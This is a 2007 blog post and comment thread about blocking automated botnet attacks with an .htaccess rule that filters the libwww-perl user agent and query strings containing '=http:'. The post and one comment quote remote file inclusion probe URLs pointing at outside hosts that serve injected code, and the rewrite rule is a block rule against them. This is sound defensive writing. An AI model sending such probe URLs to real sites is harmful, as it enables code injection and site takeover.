Website Security: Hackers, Botnets, and LIBWWW-PERL

by Scott Allen

Recently, there has been a rash of automated hacker attacks, defacing websites across the globe that don’t employ adequate security measures. Earlier this week, several friends of mine had their sites hacked and defaced. Most of these attacks don’t come from experienced hackers — they come from script kiddies employing automated scripts and a network of compromised computers (botnets). Even though these junior hackers may be inexperienced, they know enough to take down your site, and I don’t need to explain how much that can cost your business in lost revenue.

Don’t worry though, there is a simple solution that will reduce your site’s susceptibility to these attacks, and buy you some time to plug security holes. It’s relatively easy to implement, even if you’re not a security expert.

It’s amazing what a high percentage of site hacks result from random, untargeted, automated attempts to find security holes. The sad thing is, that most of these incidents could be prevented with some minor security enhancements. (Most sites don’t even employ basic security measures!) However, I’m not advocating that people stop there — I highly recommend that site owners educate themselves on website security or consult a website security expert. If you would otherwise have no security in place, at least implement this. It will buy you a little time to figure out where your potential security holes are and plug them.

Before we proceed, I need to clarify a couple of points, and these are extremely important:

This post is for going to primarily be helpful for those who have little or no security experience, and is not intended for advanced security. I’m assuming that those reading this are do-it-yourselfers, and without these tips your site would have little or no security.
This method is not a substitute for good security practices in the coding of scripts.
This alone WILL NOT prevent an experienced hacker from getting into your site.

NOTES ON SECURITY:
Security is about reducing risk, and lowering the statistical probability of a successful attack. You can never eliminate risk fully, and there is no such thing as 100% impenetrable security, even with the best measures in place. By increasing the the level of security for your site or application, you are shrinking the pool of hackers that have the [skill|experience|time|resources|desire] to hack your site. In most criminal acts, it’s about following the path of least resistance — if you increase the difficulty of success (sometimes by even a small margin) then often the hacker will go somewhere else. Think of other crimes like car theft or breaking into a house. In most cases, if a thief is checking out your car, but discovers that you have a vehicle with all the top security measures, he’ll move on to an easier one. That is, unless he has a specific reason to target your car. There are very purposeful and targeted crimes, but these are much less common than the crimes of least resistance. When hackers break into banking or large corporate web sites, they have a specific target, and incredible amounts of skill and resources. Compared to typical website hacks, the overall percentage of attacks like this is extremely low, because there aren’t many out there who could carry it out. Even with the best security measures in place, any server can be hacked by someone with the right skills and resources. There are always a few people smarter than your best security measures, but luckily, not too many of them. That’s why there is no such thing as complete security, and why security deals with reducing risk. That being said, lets move on.

Start With Your Logs

By monitoring website logs, you can discover that many of these come from User-Agent libwww-perl, and try to access url’s on your site that include another off-site url in the query string:
http://www.yoursite.com/page.php?id1=http://www.othersite.net/id.txt?

You can see that in the Query String (id1=http://www.othersite.net/id.txt?), they are trying to call the external url to try and upload files or inject code into your site. This is typical of botnet scripts that automatically look for vulnerabilities in your software.

By blocking access from libwww-perl, and blocking urls that include “=http:” you will eliminate many of these attacks, and keep inexperienced hackers from owning your site and/or server.

The Solution: A Few Lines of .Htaccess Code

There is a quick solution that most website owners shouldn’t have any problem implementing.

If the following is not already in your .htaccess file, then insert it near the beginning:

RewriteEngine on

Somewhere after that, insert the following:

RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)=http: [NC] RewriteRule ^(.*)$ - [F,L]

This won’t affect most of your other applications, because file uploads are usually done through a form with the POST method, not GET. (If they are using GET, then for security you need to take that script offline and replace it with one that uses POST instead.)

By implementing this minor security fix, you can eliminate a large number of automated botnet attacks, and prevent them from uploading files or injecting code into your site.

To be clear, this does not make your safe 100% secure, so don’t stop here. As I’ve mentioned before, this will not prevent experienced hackers from getting into your site, but it is an easy way for most site owners to increase a site’s security. (For comprehensive security measures, you may want to consult a website security expert.) The next step is to take the time to find and plug any security flaws your site may have.

UPDATE 12/20/07: When upgrading your WordPress blog to a more recent version, WordPress may ask to upgrade your database. This code will need to be temporarily removed during the databases upgrade. Then replace it afterwards.

Other Basic Security Tips:

Research scripts before installing.
Before you install a web application, plugin or script, research it online through Google, Yahoo, etc and see if there have been security issues. This is most applicable with open-source scripts.
Keep your scripts up to date!
Application developers often find security holes, patch them and release regular updates to their product. If you’re not keeping up with these, chances are high that you’ll get hacked sooner or later. As soon as holes are discovered, hackers create automated scripts that target that hole.
Be careful with file permissions.
Don’t set a file’s permission to 777 (Read/Write/Execute) unless you know exactly what you are doing.

More Info on Botnets and Internet Security:

This post was inspired by the recent hacks, and by a post on IncrediBILL’s blog: Block LIBWWW-PERL and web addresses to protect your site from botnets.

Tags:
website security | hacking | .htaccess | botnets | WebGeek

Bookmark or Share with Friends: These icons link to social bookmarking sites where readers can share and discover new web pages.

If you enjoyed this post, make sure you subscribe to the RSS feed!

Email This to a Friend

Print This Post

Improve Site Security and SEO with One Line of Code

Web Site Security - Bot Traps

Contact Form Generator

PHP-Based User Authentication

About This Entry

You’re currently reading “Website Security: Hackers, Botnets, and LIBWWW-PERL,” an entry on WebGeek

Published:: 11.06.07 / 5pm

Category:: .htaccess, Bad Bots, Website Security

Related Posts:: Examining Logs and Sharing Knowledge Can Help Expose Security Flaws
Improve Site Security and SEO with One Line of Code
Web Site Security - Bot Traps
Contact Form Generator
PHP-Based User Authentication

RSS Feeds:: Subscribe to Blog
Subscribe to Comments

Share:: Email This to a Friend
WebGeek Badges

WordPress Plugins:: WP-SpamFree: Blog Anti-Spam

About Us:: Hybrid6 Studios is a
web design and SEO firm
based in Los Angeles, CA.

Dave November 8, 2007

I would leave out the libwww stuff if it were me. That i a standard perl library and while it can be used for hacking it has many legitimate uses as well. Also, it is relatively trivial to set the User-Agent and hence avoid any RewriteConds that detect it.

The second rule, however, will stop many attacks dead in their tracks. Unless you have a valid URL on your site that involves =http: then it’s not a bad idea to have this rule active.

On the other hand, this technique is treating the symptom, not the cause. It’s still worthwhile implementing it as another layer of security but it’s not a substitute for secure coding. A lot of these attack rely on register_globals being turned on in php.ini. Turning that off is yet another layer that treats the symptom but is still worthwhile.

Scott Allen November 8, 2007

Dave, thanks for sharing your thoughts. You’d be surprised how many inexperienced hackers there are who are too lazy to change the User-Agent. (I’ve got stats to prove it, and to be honest, I’m a little blown away.) I absolutely agree…this alone isn’t enough to stop an attack with any kind of sophistication, but then it’s not meant to. (On our sites, and client sites, we have much more advanced measures in place.)

Think of it from a purely numbers perspective. Say that 99.9% of hack attempts are automated botnet attacks using libwww-perl (User-Agent unchanged). Let’s also take a look at the fact that most site owners install scripts and have no idea about the security level. Their sites get hacked and they lose thousands of dollars of business, and days getting things restored/patched etc. Unbelievably, a high percentage of these horrendous situations can be prevented with a few lines of code. Wouldn’t that be useful for most site owners to spend a couple minutes to implement?

Most site hacks aren’t the result of any real skill. For me personally, I wouldn’t be as mad if a really talented hacker got into one of my sites, as I would if a novice with a couple tricks got in. Reason being, the latter is completely preventable and something you would kick yourself for not preventing. It is literally amazing how many hacks can be prevented with even the most basic measures. Does that mean we should only use basic measures? Heck no! If you have the ability to do more, then by all means, do so! But for those who don’t know much about site security, installing some basic measures will reduce the risks of hacks exponentially. Here’s an analogy…If you lived in a crime-ridden neighborhood, you would be stupid not to lock the door to your house. Without locking your door, you might as well hang a sign out front that says “Rob me”. Most website owners are effectively sporting this sign. Your house may not have a fancy alarm system, which would obviously be better, but simply locking the door increases your security level tremendously. It’s definitely better than nothing.

I also agree about the importance of treating the problem instead of the symptom. This fix is meant to simply reduce risk, and provide an additional layer of security. Users need to implement it, and then immediately proceed to make sure all their scripts are up-to-date and that there aren’t any other security holes.

If there’s a legitimate reason to not block libwww, that’s fine. Most will never need it to be allowed though. Also, good call on register_globals. With many hosts you can turn it on or off in .htaccess. (There are cases for it being on, but only with a security-conscious development team.) I too would rather see a site with redundant layers of security than too little protection.

Dave November 12, 2007

My point about leaving out the libwww line was that RewriteCond lines have an implicit [AND] between them. People requesting the dangerous URLs using any other user agent would still get through.

However, upon looking more closely at the example in the article it appears you already have an [OR] after the first one that I missed the first time I read through it.

This is my sheepish face. Your Rewrite-Fu is strong.

I completely agree with you about lazy hackers. The number of attempts I get which look like index.php?var=http://ivebeenhacked.com/exploit.txt? is staggering. They haven’t even been bothered enough to change the var= to something more likely to work like page= or class= or p=.

Scott Allen November 14, 2007

RewriteFu — I like that. LOL, I’ll have to use it sometime. No worries, man. I enjoy the dialogue.

Yes, that’s exactly what I’m talking about with lazy hackers. I guess you could say they’re the low hanging fruit of the web security world….easy to pick off.

Subdreamer CMS bad - Hackers Worse | A Daily Rant April 12, 2008

[…] If for some reason these kiddie-script jockeys are throwing every “copy and paste” url they can find at your site; WebGeek has a good post to look at for your .htaccess here - “Website Security: Hackers, Botnets, and LIBWWW-PERL“. […]

Hacker IP Addresses | A Daily Rant April 16, 2008

[…] posted this before - WebGeek has a fix for a LOT of the Code Injection attempts. Technorati tags: htaccess, website-security, […]

06-07-2008 Blacklisted | A Daily Rant June 7, 2008

[…] For any that have not read a previous post to keep the hackers from actually getting into your site - go back and read this post or visit WebGeek and see what you can do to fix the hack attempts. […]

WebGeek

Website Security: Hackers, Botnets, and LIBWWW-PERL

About This Entry

7 Comments

Post a Comment »

Comment Guidelines

Recent Comments

Recently

Monthly Archives